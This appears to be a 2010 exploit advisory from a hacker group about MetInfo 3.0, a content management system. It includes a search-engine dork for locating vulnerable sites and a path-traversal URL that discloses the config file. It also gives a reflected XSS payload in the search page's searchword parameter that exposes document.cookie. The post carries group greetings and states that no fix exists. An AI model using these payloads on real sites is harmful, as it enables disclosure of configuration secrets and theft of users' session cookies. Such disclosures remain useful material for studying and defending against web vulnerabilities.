Metinfo v3.0 Multiple Vulnerabilities

2010-11-12 09:15:29

# Exploit Title: metinfo3.0 Mullti Vulnerability

# Date : 10-11-2010

# Author : anT!-Tr0J4n

# Version : 3.0

#DorK : Powered by MetInfo 3.0

# Home : www.Dev-PoinT.com : http://milw0rm.ws

#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com

Vendor£ : http://www.metinfo.cn/

#Greetz : Dev-PoinT.com ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil ; Cyber-Err0r ; Mr.Mh$TEr ; M [Zero] ; R3d-D3v1l

#special thanks to milw0rm.ws team : r0073r,Sid3^effects,L0rd CruSad3r,SeeMe,Sonic,gunslinger_,Sn!pEr.S!Te,n4pst3rr,indoushka, KnocKout,SONiC,ZoRLu


========================================================
metinfo3.0 source code disclosure Vulnerability
========================================================

[>] exploit ->

[+] http://localhost/metinfo/templates/met001/../../ [file disclosure]

EX :

[+] http://localhost/metinfo/templates/met001/../../config


======================================================
[>] metinfo3.0 XSS Vulnerability
======================================================

[>] exploit -> XSS Vulnerability


http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=[XSS]


http://localhost/metinfo/search/search.php?lang=en&class1=0&class2=0&class3=0&searchtype=0&searchword=1<script>alert(document.cookie)</script>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[+] Site : Inj3ct0r.com
[+] Support e-mail : submit[at]inj3ct0r.com
[+] I'm anT!-Tr0J4n member from Inj3ct0r Team

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.